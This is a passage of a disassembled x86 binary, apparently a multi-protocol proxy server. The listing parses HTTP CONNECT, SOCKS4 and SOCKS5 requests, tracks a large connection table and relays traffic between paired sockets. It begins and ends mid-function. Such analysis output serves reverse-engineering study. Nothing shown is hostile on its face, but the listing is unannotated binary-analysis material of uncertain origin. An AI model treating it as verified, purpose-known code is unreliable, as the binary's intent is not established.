mov [ebp+var_1B8], eax
loc_401BBF: ; CODE XREF: sub_4017F0+4FE�j
; sub_4017F0+56A�j ...
cmp eax, 47D2h
jnb loc_401A6A
lea esi, [eax+eax*2]
lea esi, [esi+esi*4]
shl esi, 2
mov eax, dword_409D28[esi]
test eax, eax
jz loc_402817
mov [ebp+var_11C4], 0
push 0
call sub_402A3C
add esp, 4
sub eax, dword_409D38[esi]
cmp eax, 1Eh
jb short loc_401C27
lea edi, dword_409D20[esi]
cmp dword ptr [edi], 3
jz short loc_401C27
mov eax, dword_409D58[esi]
test eax, eax
jz short loc_401C1E
push eax
call sub_401510
add esp, 4
loc_401C1E: ; CODE XREF: sub_4017F0+423�j
push edi
call sub_401510
add esp, 4
loc_401C27: ; CODE XREF: sub_4017F0+40E�j
; sub_4017F0+419�j
push 0
call sub_402A3C
add esp, 4
sub eax, dword_409D38[esi]
cmp eax, 78h
jb short loc_401C5E
mov eax, dword_409D58[esi]
test eax, eax
jz short loc_401C4F
push eax
call sub_401510
add esp, 4
loc_401C4F: ; CODE XREF: sub_4017F0+454�j
lea ecx, dword_409D20[esi]
push ecx
call sub_401510
add esp, 4
loc_401C5E: ; CODE XREF: sub_4017F0+44A�j
mov eax, dword_409D3C[esi]
test eax, eax
jz short loc_401C95
lea edx, [ebp+var_FBC]
push edx
mov eax, dword_409D28[esi]
push eax
call sub_40286C
test eax, eax
jz short loc_401C95
push 0
push offset dword_409A7C
lea ecx, dword_409D20[esi]
push ecx
call sub_4012A0
add esp, 0Ch
loc_401C95: ; CODE XREF: sub_4017F0+476�j
; sub_4017F0+48D�j
lea ebx, dword_409D20[esi]
cmp dword ptr [ebx], 1
jnz loc_402402
lea edx, [ebp+var_10C0]
push edx
mov eax, dword_409D28[esi]
push eax
call sub_40286C
test eax, eax
jz loc_402402
push 0BB8h
lea ecx, [ebp+var_EB0]
push ecx
push ebx
call sub_4014A0
add esp, 0Ch
test eax, eax
jz short loc_401CF3
push ebx
call sub_401510
add esp, 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_401CF3: ; CODE XREF: sub_4017F0+4E6�j
mov al, byte ptr [ebp+var_EB0]
cmp al, 47h
jz short loc_401D05
cmp al, 50h
jnz loc_402003
loc_401D05: ; CODE XREF: sub_4017F0+50B�j
xor eax, eax
mov [ebp+var_22D8], eax
mov [ebp+var_12D0], eax
lea edi, [ebp+var_EB0]
loc_401D19: ; CODE XREF: sub_4017F0+53A�j
mov [ebp+var_11C8], edi
mov al, [edi]
test al, al
jz short loc_401D2C
cmp al, 20h
jz short loc_401D2C
inc edi
jmp short loc_401D19
; ---------------------------------------------------------------------------
loc_401D2C: ; CODE XREF: sub_4017F0+533�j
; sub_4017F0+537�j
cmp byte ptr [edi], 20h
jz short loc_401D5F
loc_401D31: ; CODE XREF: sub_4017F0+60F�j
; sub_4017F0+8BD�j
mov eax, [ebp+var_1B8]
lea eax, [eax+eax*2]
lea edx, [eax+eax*4]
lea eax, ds:409D20h[edx*4]
push eax
call sub_401510
add esp, 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_401D5F: ; CODE XREF: sub_4017F0+53F�j
inc edi
mov [ebp+var_11C8], edi
cmp byte ptr [edi], 0
jnz short loc_401D99
loc_401D6B: ; CODE XREF: sub_4017F0+917�j
mov eax, [ebp+var_1B8]
lea eax, [eax+eax*2]
lea ecx, [eax+eax*4]
lea edx, ds:409D20h[ecx*4]
push edx
call sub_401510
add esp, 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_401D99: ; CODE XREF: sub_4017F0+579�j
push 7
push offset aHttp ; "http://"
push edi
call sub_402C80
add esp, 0Ch
test eax, eax
jnz short loc_401DB6
add edi, 7
mov [ebp+var_11C8], edi
loc_401DB6: ; CODE XREF: sub_4017F0+5BB�j
mov esi, edi
mov [ebp+var_22D4], esi
loc_401DBE: ; CODE XREF: sub_4017F0+5E3�j
mov al, [edi]
test al, al
jz short loc_401DD5
cmp al, 2Fh
jz short loc_401DD5
cmp al, 20h
jz short loc_401DD5
inc edi
mov [ebp+var_11C8], edi
jmp short loc_401DBE
; ---------------------------------------------------------------------------
loc_401DD5: ; CODE XREF: sub_4017F0+5D2�j
; sub_4017F0+5D6�j ...
mov al, [edi]
cmp al, 20h
jz short loc_401DED
cmp al, 2Fh
jz short loc_401DED
mov eax, [ebp+var_1B8]
lea eax, [eax+eax*2]
jmp loc_402243
; ---------------------------------------------------------------------------
loc_401DED: ; CODE XREF: sub_4017F0+5E9�j
; sub_4017F0+5ED�j
mov ebx, edi
mov [ebp+var_12CC], ebx
mov edx, edi
sub edx, esi
cmp edx, 0FFh
ja loc_401D31
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_12C8]
rep stosd
mov ecx, edx
lea edi, [ebp+var_12C8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea esi, [ebp+var_12C8]
loc_401E2E: ; CODE XREF: sub_4017F0+64F�j
mov [ebp+var_11C8], esi
mov al, [esi]
test al, al
jz short loc_401E41
cmp al, 3Ah
jz short loc_401E41
inc esi
jmp short loc_401E2E
; ---------------------------------------------------------------------------
loc_401E41: ; CODE XREF: sub_4017F0+648�j
; sub_4017F0+64C�j
cmp byte ptr [esi], 3Ah
jnz short loc_401E5B
lea eax, [esi+1]
push eax
call sub_402BE9
add esp, 4
mov [ebp+var_22D8], eax
mov byte ptr [esi], 0
loc_401E5B: ; CODE XREF: sub_4017F0+654�j
mov eax, [ebp+var_22D8]
test eax, eax
jnz short loc_401E6F
mov [ebp+var_22D8], 50h
loc_401E6F: ; CODE XREF: sub_4017F0+673�j
mov ecx, 400h
xor eax, eax
lea edi, [ebp+var_22D0]
rep stosd
lea esi, [ebp+var_EB0]
loc_401E84: ; CODE XREF: sub_4017F0+6BD�j
mov [ebp+var_11C8], esi
mov dl, [esi]
test dl, dl
jz short loc_401EAF
cmp dl, 20h
jz short loc_401EAF
lea edi, [ebp+var_22D0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+ecx+var_22D0], dl
inc esi
jmp short loc_401E84
; ---------------------------------------------------------------------------
loc_401EAF: ; CODE XREF: sub_4017F0+69E�j
; sub_4017F0+6A3�j
lea edi, [ebp+var_22D0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+ecx+var_22D0], 20h
lea edx, [ebp+var_22D0]
mov edi, ebx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_12D0], eax
loc_401EF8: ; CODE XREF: sub_4017F0+7CF�j
mov [ebp+var_1C], eax
cmp eax, 47D2h
jnb loc_401FC4
lea esi, [eax+eax*2]
lea esi, [esi+esi*4]
shl esi, 2
mov ecx, dword_409D28[esi]
test ecx, ecx
jnz loc_401FBE
lea edi, dword_409D20[esi]
mov eax, [ebp+var_22D8]
push eax
lea ecx, [ebp+var_12C8]
push ecx
push edi
call sub_401080
add esp, 0Ch
test eax, eax
jz short loc_401F66
mov ebx, [ebp+var_1B8]
lea eax, [ebx+ebx*2]
lea edx, [eax+eax*4]
lea eax, ds:409D20h[edx*4]
push eax
call sub_401510
add esp, 4
mov [ebp+var_12D0], 1
jmp short loc_401FCA
; ---------------------------------------------------------------------------
loc_401F66: ; CODE XREF: sub_4017F0+74C�j
mov dword ptr [edi], 2
lea ecx, [ebp+var_22D0]
push ecx
call sub_4077C5
mov dword_409D40[esi], eax
push 0
call sub_402A3C
mov dword_409D34[esi], eax
push 0
call sub_402A3C
add esp, 0Ch
mov dword_409D38[esi], eax
mov ebx, [ebp+var_1B8]
lea eax, [ebx+ebx*2]
lea eax, [eax+eax*4]
shl eax, 2
lea edx, dword_409D20[eax]
mov dword_409D58[esi], edx
mov dword_409D58[eax], edi
jmp short loc_401FCA
; ---------------------------------------------------------------------------
loc_401FBE: ; CODE XREF: sub_4017F0+727�j
inc eax
jmp loc_401EF8
; ---------------------------------------------------------------------------
loc_401FC4: ; CODE XREF: sub_4017F0+710�j
mov ebx, [ebp+var_1B8]
loc_401FCA: ; CODE XREF: sub_4017F0+774�j
; sub_4017F0+7CC�j
mov eax, [ebp+var_12D0]
test eax, eax
jnz loc_402240
mov eax, [ebp+var_1B8]
lea esi, [eax+eax*2]
lea esi, [esi+esi*4]
shl esi, 2
lea ebx, dword_409D20[esi]
mov dword ptr [ebx], 29Ah
mov dword_409D24[esi], 6
mov al, byte ptr [ebp+var_EB0]
loc_402003: ; CODE XREF: sub_4017F0+50F�j
cmp al, 43h
jnz loc_402293
mov [ebp+var_22E8], 0
loc_402015: ; CODE XREF: sub_4017F0+880�j
lea edi, [ebp+var_EB0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
jz short loc_402072
lea edi, [ebp+var_EB0]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
cmp byte ptr [ebp+ecx+var_EB4+3], 0Ah
jz short loc_402059
lea edi, [ebp+var_EB0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp byte ptr [ebp+ecx+var_EB4+3], 0Dh
jnz short loc_402072
loc_402059: ; CODE XREF: sub_4017F0+84D�j
lea edi, [ebp+var_EB0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov byte ptr [ebp+ecx+var_EB4+3], al
jmp short loc_402015
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_4017F0+835�j
; sub_4017F0+867�j
xor edx, edx
mov [ebp+var_22E4], edx
xor esi, esi
mov [ebp+var_22E0], esi
loc_402082: ; CODE XREF: sub_4017F0+90A�j
lea edi, [ebp+var_EB0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp edx, ecx
jnb short loc_4020AB
cmp byte ptr [ebp+edx+var_EB0], 20h
jnz short loc_4020F3
mov esi, 1
mov [ebp+var_22E0], esi
loc_4020AB: ; CODE XREF: sub_4017F0+8A4�j
test esi, esi
jz loc_401D31
lea ebx, [ebp+edx+var_EB0+1]
mov [ebp+var_22DC], ebx
xor edx, edx
mov [ebp+var_22E4], edx
xor esi, esi
mov [ebp+var_22E0], esi
loc_4020D0: ; CODE XREF: sub_4017F0+913�j
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp edx, ecx
jnb short loc_402105
cmp byte ptr [ebx+edx], 20h
jnz short loc_4020FC
mov esi, 1
mov [ebp+var_22E0], esi
jmp short loc_402105
; ---------------------------------------------------------------------------
loc_4020F3: ; CODE XREF: sub_4017F0+8AE�j
inc edx
mov [ebp+var_22E4], edx
jmp short loc_402082
; ---------------------------------------------------------------------------
loc_4020FC: ; CODE XREF: sub_4017F0+8F4�j
inc edx
mov [ebp+var_22E4], edx
jmp short loc_4020D0
; ---------------------------------------------------------------------------
loc_402105: ; CODE XREF: sub_4017F0+8EE�j
; sub_4017F0+901�j
test esi, esi
jz loc_401D6B
mov byte ptr [ebx+edx], 0
xor esi, esi
mov [ebp+var_22E4], esi
xor edx, edx
mov [ebp+var_22E0], edx
loc_402121: ; CODE XREF: sub_4017F0+96B�j
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp esi, ecx
jnb short loc_402142
cmp byte ptr [ebx+esi], 3Ah
jnz short loc_402154
mov edx, 1
mov [ebp+var_22E0], edx
loc_402142: ; CODE XREF: sub_4017F0+93F�j
test edx, edx
jnz short loc_40215D
mov eax, [ebp+var_1B8]
lea eax, [eax+eax*2]
jmp loc_402243
; ---------------------------------------------------------------------------
loc_402154: ; CODE XREF: sub_4017F0+945�j
inc esi
mov [ebp+var_22E4], esi
jmp short loc_402121
; ---------------------------------------------------------------------------
loc_40215D: ; CODE XREF: sub_4017F0+954�j
lea edx, [ebx+esi+1]
push edx
call sub_402BE9
add esp, 4
mov [ebp+var_22E8], eax
mov byte ptr [ebx+esi], 0
xor ecx, ecx
mov [ebp+var_22E0], ecx
loc_40217C: ; CODE XREF: sub_4017F0+A3B�j
mov [ebp+var_1C], ecx
cmp ecx, 47D2h
jnb loc_402230
lea esi, [ecx+ecx*2]
lea esi, [esi+esi*4]
shl esi, 2
mov edx, dword_409D28[esi]
test edx, edx
jnz loc_40222A
lea edi, dword_409D20[esi]
and eax, 0FFFFh
push eax
push ebx
push edi
call sub_401080
add esp, 0Ch
test eax, eax
jz short loc_4021E4
mov ebx, [ebp+var_1B8]
lea eax, [ebx+ebx*2]
lea eax, [eax+eax*4]
lea ecx, ds:409D20h[eax*4]
push ecx
call sub_401510
add esp, 4
mov [ebp+var_22E0], 1
jmp short loc_402236
; ---------------------------------------------------------------------------
loc_4021E4: ; CODE XREF: sub_4017F0+9CA�j
mov dword ptr [edi], 2
push 0
call sub_402A3C
mov dword_409D34[esi], eax
push 0
call sub_402A3C
add esp, 8
mov dword_409D38[esi], eax
mov ebx, [ebp+var_1B8]
lea eax, [ebx+ebx*2]
lea eax, [eax+eax*4]
shl eax, 2
lea edx, dword_409D20[eax]
mov dword_409D58[esi], edx
mov dword_409D58[eax], edi
jmp short loc_402236
; ---------------------------------------------------------------------------
loc_40222A: ; CODE XREF: sub_4017F0+9AC�j
inc ecx
jmp loc_40217C
; ---------------------------------------------------------------------------
loc_402230: ; CODE XREF: sub_4017F0+995�j
mov ebx, [ebp+var_1B8]
loc_402236: ; CODE XREF: sub_4017F0+9F2�j
; sub_4017F0+A38�j
mov eax, [ebp+var_22E0]
test eax, eax
jz short loc_402268
loc_402240: ; CODE XREF: sub_4017F0+7E2�j
lea eax, [ebx+ebx*2]
loc_402243: ; CODE XREF: sub_4017F0+5F8�j
; sub_4017F0+95F�j
lea eax, [eax+eax*4]
lea ecx, ds:409D20h[eax*4]
push ecx
call sub_401510
add esp, 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_402268: ; CODE XREF: sub_4017F0+A4E�j
mov eax, [ebp+var_1B8]
lea esi, [eax+eax*2]
lea esi, [esi+esi*4]
shl esi, 2
lea ebx, dword_409D20[esi]
mov dword ptr [ebx], 29Ah
mov dword_409D24[esi], 3
mov al, byte ptr [ebp+var_EB0]
loc_402293: ; CODE XREF: sub_4017F0+815�j
cmp al, 5
jnz short loc_4022CC
mov byte ptr [ebp+var_EB0], al
mov byte ptr [ebp+var_EB0+1], 0
push 2
lea edx, [ebp+var_EB0]
push edx
push ebx
call sub_4012A0
add esp, 0Ch
mov dword ptr [ebx], 0Bh
mov dword_409D24[esi], 5
mov al, byte ptr [ebp+var_EB0]
loc_4022CC: ; CODE XREF: sub_4017F0+AA5�j
cmp al, 4
jnz loc_402817
mov al, byte ptr [ebp+var_EB0+2]
mov byte ptr [ebp+var_11C4+1], al
mov cl, byte ptr [ebp+var_EB0+3]
mov byte ptr [ebp+var_11C4], cl
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_11C0]
rep stosd
mov edx, [ebp+var_EA9]
and edx, 0FFh
push edx
mov eax, [ebp-0EAAh]
and eax, 0FFh
push eax
mov ecx, [ebp-0EABh]
and ecx, 0FFh
push ecx
mov edx, [ebp-0EACh]
and edx, 0FFh
push edx
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea eax, [ebp+var_11C0]
push eax
call sub_402B97
add esp, 18h
xor eax, eax
loc_402344: ; CODE XREF: sub_4017F0+BD8�j
mov [ebp+var_1C], eax
cmp eax, 47D2h
jnb short loc_4023CD
lea esi, [eax+eax*2]
lea esi, [esi+esi*4]
shl esi, 2
mov ecx, dword_409D28[esi]
test ecx, ecx
jnz short loc_4023C7
lea edi, dword_409D20[esi]
mov ecx, [ebp+var_11C4]
and ecx, 0FFFFh
push ecx
lea edx, [ebp+var_11C0]
push edx
push edi
call sub_401080
mov dword ptr [edi], 2
push 0
call sub_402A3C
mov dword_409D34[esi], eax
push 0
call sub_402A3C
add esp, 14h
mov dword_409D38[esi], eax
mov ecx, [ebp+var_1B8]
lea eax, [ecx+ecx*2]
lea eax, [eax+eax*4]
shl eax, 2
lea edx, dword_409D20[eax]
mov dword_409D58[esi], edx
mov dword_409D58[eax], edi
jmp short loc_4023D3
; ---------------------------------------------------------------------------
loc_4023C7: ; CODE XREF: sub_4017F0+B6F�j
inc eax
jmp loc_402344
; ---------------------------------------------------------------------------
loc_4023CD: ; CODE XREF: sub_4017F0+B5C�j
mov ecx, [ebp+var_1B8]
loc_4023D3: ; CODE XREF: sub_4017F0+BD5�j
lea eax, [ecx+ecx*2]
lea eax, [eax+eax*4]
shl eax, 2
mov dword_409D20[eax], 29Ah
mov dword_409D24[eax], 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_402402: ; CODE XREF: sub_4017F0+4AE�j
; sub_4017F0+4C9�j
cmp dword ptr [ebx], 0Bh
jnz loc_4025C9
lea eax, [ebp+var_10C0]
push eax
mov ecx, dword_409D28[esi]
push ecx
call sub_40286C
test eax, eax
jz loc_4025C9
push 0BB8h
lea edx, [ebp+var_EB0]
push edx
push ebx
call sub_4014A0
add esp, 0Ch
test eax, eax
jz short loc_40245A
push ebx
call sub_401510
add esp, 4
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_40245A: ; CODE XREF: sub_4017F0+C4D�j
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_11C0]
rep stosd
mov al, byte ptr [ebp+var_EB0+3]
cmp al, 1
jnz short loc_4024D3
mov eax, [ebp+var_EA9]
and eax, 0FFh
push eax
mov ecx, [ebp-0EAAh]
and ecx, 0FFh
push ecx
mov edx, [ebp-0EABh]
and edx, 0FFh
push edx
mov eax, [ebp-0EACh]
and eax, 0FFh
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea ecx, [ebp+var_11C0]
push ecx
call sub_402B97
add esp, 18h
mov dl, byte ptr [ebp+var_EA9+1]
mov byte ptr [ebp+var_11C4+1], dl
mov al, byte ptr [ebp+var_EA9+2]
mov byte ptr [ebp+var_11C4], al
jmp short loc_402518
; ---------------------------------------------------------------------------
loc_4024D3: ; CODE XREF: sub_4017F0+C81�j
cmp al, 3
jnz short loc_402518
mov eax, [ebp-0EACh]
and eax, 0FFh
mov ecx, eax
lea esi, [ebp+var_EAB]
lea edi, [ebp+var_11C0]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov cl, [ebp+eax+var_EAB]
mov byte ptr [ebp+var_11C4+1], cl
mov dl, [ebp+eax+var_EAA]
mov byte ptr [ebp+var_11C4], dl
loc_402518: ; CODE XREF: sub_4017F0+CE1�j
; sub_4017F0+CE5�j
mov eax, [ebp+var_11C4]
xor ecx, ecx
loc_402520: ; CODE XREF: sub_4017F0+DAE�j
mov [ebp+var_1C], ecx
cmp ecx, 47D2h
jnb short loc_4025A0
lea esi, [ecx+ecx*2]
lea esi, [esi+esi*4]
shl esi, 2
mov edx, dword_409D28[esi]
test edx, edx
jnz short loc_40259D
lea edi, dword_409D20[esi]
and eax, 0FFFFh
push eax
lea eax, [ebp+var_11C0]
push eax
push edi
call sub_401080
mov dword ptr [edi], 2
push 0
call sub_402A3C
mov dword_409D34[esi], eax
push 0
call sub_402A3C
add esp, 14h
mov dword_409D38[esi], eax
mov ecx, [ebp+var_1B8]
lea eax, [ecx+ecx*2]
lea eax, [eax+eax*4]
shl eax, 2
lea edx, dword_409D20[eax]
mov dword_409D58[esi], edx
mov dword_409D58[eax], edi
jmp short loc_4025A6
; ---------------------------------------------------------------------------
loc_40259D: ; CODE XREF: sub_4017F0+D4C�j
inc ecx
jmp short loc_402520
; ---------------------------------------------------------------------------
loc_4025A0: ; CODE XREF: sub_4017F0+D39�j
mov ecx, [ebp+var_1B8]
loc_4025A6: ; CODE XREF: sub_4017F0+DAB�j
lea eax, [ecx+ecx*2]
lea eax, [eax+eax*4]
mov dword_409D20[eax*4], 29Ah
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_4025C9: ; CODE XREF: sub_4017F0+C15�j
; sub_4017F0+C30�j
cmp dword ptr [ebx], 2
jnz loc_40277C
push 0
call sub_402A3C
add esp, 4
sub eax, dword_409D34[esi]
cmp eax, 1
jb loc_40277C
push ebx
call sub_401000
mov edi, eax
mov [ebp+var_1C], edi
push 0
call sub_402A3C
add esp, 8
mov dword_409D34[esi], eax
cmp edi, 2
jz loc_4026EC
push 0
call sub_402A3C
add esp, 4
sub eax, dword_409D38[esi]
cmp eax, 3Ch
jnb loc_4026EC
test edi, edi
jnz loc_402817
xor ecx, ecx
mov [ebp+var_EB0], ecx
mov [ebp-0EACh], ecx
mov byte ptr [ebp+var_EA9+1], cl
mov eax, dword_409D58[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_402665
mov byte ptr [ebp+var_EB0+1], 5Ah
push 8
lea edx, [ebp+var_EB0]
push edx
push eax
jmp short loc_4026C0
; ---------------------------------------------------------------------------
loc_402665: ; CODE XREF: sub_4017F0+E60�j
cmp ecx, 3
jnz short loc_40267A
push offset aHttp1_0200Conn ; "HTTP/1.0 200 Connection established\r\n\r\n"...
push eax
call sub_4013E0
add esp, 8
jmp short loc_4026C8
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_4017F0+E78�j
cmp ecx, 5
jnz short loc_4026A6
mov byte ptr [ebp+var_EB0], cl
mov byte ptr [ebp+var_EB0+1], 0
mov byte ptr [ebp+var_EB0+2], 0
mov byte ptr [ebp+var_EB0+3], 1
push 9
lea ecx, [ebp+var_EB0]
push ecx
push eax
jmp short loc_4026C0
; ---------------------------------------------------------------------------
loc_4026A6: ; CODE XREF: sub_4017F0+E8D�j
cmp ecx, 6
jnz short loc_4026C8
mov edx, dword_409D40[esi]
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push edx
push ebx
loc_4026C0: ; CODE XREF: sub_4017F0+E73�j
; sub_4017F0+EB4�j
call sub_4012A0
add esp, 0Ch
loc_4026C8: ; CODE XREF: sub_4017F0+E88�j
; sub_4017F0+EB9�j
mov dword ptr [ebx], 3
mov edx, dword_409D58[esi]
mov dword ptr [edx], 3
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_4026EC: ; CODE XREF: sub_4017F0+E19�j
; sub_4017F0+E32�j
xor eax, eax
mov [ebp+var_EB0], eax
mov [ebp-0EACh], eax
mov byte ptr [ebp+var_EA9+1], al
mov eax, dword_409D58[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_402720
mov byte ptr [ebp+var_EB0+1], 5Bh
push 8
lea ecx, [ebp+var_EB0]
push ecx
jmp short loc_402767
; ---------------------------------------------------------------------------
loc_402720: ; CODE XREF: sub_4017F0+F1C�j
cmp ecx, 3
jnz short loc_40273F
push offset aHttp1_0201Unab ; "HTTP/1.0 201 Unable to connect\r\n\r\n"
push eax
call sub_4013E0
add esp, 8
mov eax, dword_409D58[esi]
push eax
jmp loc_402809
; ---------------------------------------------------------------------------
loc_40273F: ; CODE XREF: sub_4017F0+F33�j
cmp ecx, 5
jnz short loc_402770
mov byte ptr [ebp+var_EB0], cl
mov byte ptr [ebp+var_EB0+1], cl
mov byte ptr [ebp+var_EB0+2], 0
mov byte ptr [ebp+var_EB0+3], 1
push 9
lea edx, [ebp+var_EB0]
push edx
loc_402767: ; CODE XREF: sub_4017F0+F2E�j
push eax
call sub_4012A0
add esp, 0Ch
loc_402770: ; CODE XREF: sub_4017F0+F52�j
mov eax, dword_409D58[esi]
push eax
jmp loc_402809
; ---------------------------------------------------------------------------
loc_40277C: ; CODE XREF: sub_4017F0+DDC�j
; sub_4017F0+DF5�j
mov eax, dword_409D58[esi]
test eax, eax
jz loc_402817
mov ecx, [eax+1Ch]
test ecx, ecx
jnz loc_402817
mov eax, [ebx]
cmp eax, 3
jz short loc_4027A3
cmp eax, 29Ah
jnz short loc_402817
loc_4027A3: ; CODE XREF: sub_4017F0+FAA�j
lea ecx, [ebp+var_10C0]
push ecx
mov edx, dword_409D28[esi]
push edx
call sub_40286C
test eax, eax
jz short loc_402817
push 0BB8h
lea eax, [ebp+var_EB0]
push eax
push ebx
call sub_4014A0
add esp, 0Ch
test eax, eax
jnz short loc_402802
mov ecx, dword_409D30[esi]
push ecx
lea edx, [ebp+var_EB0]
push edx
mov eax, dword_409D58[esi]
push eax
call sub_4012A0
add esp, 0Ch
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
; ---------------------------------------------------------------------------
loc_402802: ; CODE XREF: sub_4017F0+FE1�j
mov ecx, dword_409D58[esi]
push ecx
loc_402809: ; CODE XREF: sub_4017F0+F4A�j
; sub_4017F0+F87�j
call sub_401510
push ebx
call sub_401510
add esp, 8
loc_402817: ; CODE XREF: sub_4017F0+3EB�j
; sub_4017F0+ADE�j ...
mov eax, [ebp+var_1B8]
inc eax
mov [ebp+var_1B8], eax
jmp loc_401BBF
sub_4017F0 endp
; ---------------------------------------------------------------------------
mov edx, [ebp-14h]
push edx
call sub_401790
; ---------------------------------------------------------------------------
add esp, 4
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402860 proc near ; CODE XREF: sub_401080+70�p
; sub_401580+5B�p
jmp dword_40811C
sub_402860 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402866 proc near ; CODE XREF: sub_401080+50�p
; sub_401080+5A�p ...
jmp dword_408118
sub_402866 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40286C proc near ; CODE XREF: sub_4017F0+36B�p
; sub_4017F0+486�p ...
jmp dword_408114
sub_40286C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402872 proc near ; CODE XREF: sub_4012A0+DE�p
; sub_4017F0+349�p
jmp dword_408110
sub_402872 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402878 proc near ; CODE XREF: sub_4011E0+63�p
jmp dword_40810C
sub_402878 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40287E proc near ; CODE XREF: sub_401080+A8�p
; sub_4011E0+53�p ...
jmp dword_408108
sub_40287E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402884 proc near ; CODE XREF: sub_401000+34�p
; sub_401000+40�p ...
jmp dword_408104
sub_402884 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40288A proc near ; CODE XREF: sub_401000+2B�p
jmp dword_408100
sub_40288A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402890 proc near ; CODE XREF: sub_401080+BF�p
; sub_4011E0+A3�p
jmp dword_4080FC
sub_402890 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402896 proc near ; CODE XREF: sub_401080+32�p
; sub_4011E0+27�p ...
jmp dword_4080F8
sub_402896 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40289C proc near ; CODE XREF: sub_401160+3B�p
jmp dword_4080F4
sub_40289C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028A2 proc near ; CODE XREF: sub_4011E0+81�p
jmp dword_4080F0
sub_4028A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028A8 proc near ; CODE XREF: sub_4012A0+F9�p
jmp dword_4080EC
sub_4028A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028AE proc near ; CODE XREF: sub_4014A0+29�p
jmp dword_4080E8
sub_4028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028B4 proc near ; CODE XREF: sub_401510+1B�p
; sub_4016A0+1B�p
jmp dword_4080E4
sub_4028B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028BA proc near ; CODE XREF: sub_401630+37�p
jmp dword_4080E0
sub_4028BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4028C0 proc near ; CODE XREF: sub_4017F0+1E1�p
jmp dword_4080DC
sub_4028C0 endp
; =============== S U B R O U T I N E =======================================
sub_4028C6 proc near ; CODE XREF: sub_4012A0+3A�p
; sub_4013E0+27�p ...
arg_0 = dword ptr 4
push dword_409AF4
push [esp+4+arg_0]
call sub_4028D8
pop ecx
pop ecx
retn
sub_4028C6 endp
; =============== S U B R O U T I N E =======================================
sub_4028D8 proc near ; CODE XREF: sub_4028C6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_402901
loc_4028DF: ; CODE XREF: sub_4028D8+27�j
push [esp+arg_0]
call sub_402904
test eax, eax
pop ecx
jnz short locret_402903
